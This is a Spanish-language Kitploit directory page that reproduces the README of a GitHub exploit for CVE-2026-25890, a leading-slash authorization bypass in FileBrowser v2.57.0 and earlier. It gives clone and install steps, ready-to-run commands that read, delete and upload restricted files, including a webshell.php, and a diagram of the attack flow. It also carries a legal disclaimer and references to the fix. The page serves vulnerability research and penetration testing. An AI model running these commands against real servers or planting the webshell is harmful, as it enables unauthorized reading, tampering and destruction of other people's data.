Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — Exploit para CVE-2026-25890, una omisión de autorización basada en rutas en FileBrowser <= v2.57.0, que permite a usuarios autenticados con privilegios bajos leer, subir y eliminar archivos restringidos mediante múltiples barras diagonales iniciales. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

Exploit para CVE-2026-25890, una omisión de autorización basada en rutas en FileBrowser <= v2.57.0, que permite a usuarios autenticados con privilegios bajos leer, subir y eliminar archivos restringidos mediante múltiples barras diagonales iniciales.

Ver Repositorio
3hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25890 - Bypass de Control de Acceso en FileBrowser

Author GitHub license Python version CVE Exploit-DB Tested on

Los usuarios no autenticados no pueden explotar esto: se requieren credenciales válidas de bajo privilegio que estén restringidas de la ruta objetivo.

Bypass de autorización basado en ruta en FileBrowser ≤ v2.57.0 usando múltiples barras iniciales (//private en lugar de /private) para evadir las comprobaciones de strings.HasPrefix() mientras el sistema de archivos sigue sirviendo la ruta canónica.

Corregido en v2.57.1 (commit 489af403... – se eliminó r.SkipClean(true)).

📦 Características

  • Leer archivos restringidos
  • Subir archivos a directorios restringidos
  • Eliminar archivos restringidos
  • Número personalizable de barras iniciales para probar el bypass
  • Guardar archivos filtrados localmente
  • Vista previa detallada del contenido
  • CLI limpia con argparse

🛠️ Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# Sin dependencias más allá de la biblioteca estándar + requests
pip install requests

🚀 Uso

root@kitploit:~
python3 exploit.py --help

Ejemplos básicos

root@kitploit:~
# Leer un archivo restringido
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# Subir un archivo malicioso a una carpeta restringida
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# Eliminar un archivo restringido
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 Flujo del Ataque PoC

root@kitploit:~
sequenceDiagram
    participant Atacante
    participant FileBrowser ≤ v2.57.0
    participant Enrutador Gorilla Mux
    participant Middleware de Autenticación
    participant Manejador del Sistema de Archivos

    Atacante->>FileBrowser: GET /api/resources/private/secret.txt<br>(solicitud normal)
    FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
    Gorilla Mux->>Middleware de Autenticación: path = "/private/secret.txt"
    Middleware de Autenticación->>Middleware de Autenticación: strings.HasPrefix("/private/secret.txt", no permitido="/private") → true
    Middleware de Autenticación->>Atacante: 403 Prohibido

    Note over Atacante,FileBrowser: El atacante intenta el bypass

    Atacante->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → sin normalización)
    Gorilla Mux->>Middleware de Autenticación: path = "//private/secret.txt"
    Middleware de Autenticación->>Middleware de Autenticación: HasPrefix("//private/secret.txt", "/private") → false
    Middleware de Autenticación->>Manejador del Sistema de Archivos: Permitido → continuar
    Manejador del Sistema de Archivos->>Sistema de Archivos: Normaliza // → /private/secret.txt
    Sistema de Archivos->>Manejador del Sistema de Archivos: Devuelve el contenido del archivo
    Manejador del Sistema de Archivos->>Atacante: 200 OK + contenido secreto

⚠️ Aviso Legal y Ético

Esta prueba de concepto se proporciona estrictamente con fines educativos y de investigación en seguridad.
No utilice este código contra ningún sistema sin permiso explícito por escrito del propietario.
El acceso o la modificación no autorizados de sistemas son ilegales en la mayoría de las jurisdicciones (p. ej., CFAA, Computer Misuse Act).

📜 Referencias

  • Aviso de GitHub GHSA-4mh3-h929-w968
  • Commit de la corrección
  • Versión v2.57.1

❤️ Créditos

Autor del Exploit: Mohammed Idrees Banyamer
País: Jordania
Instagram: @banyamer_security

¡Dale una estrella ⭐ al repositorio si te resulta útil!


Última actualización: febrero de 2026

Descargar herramienta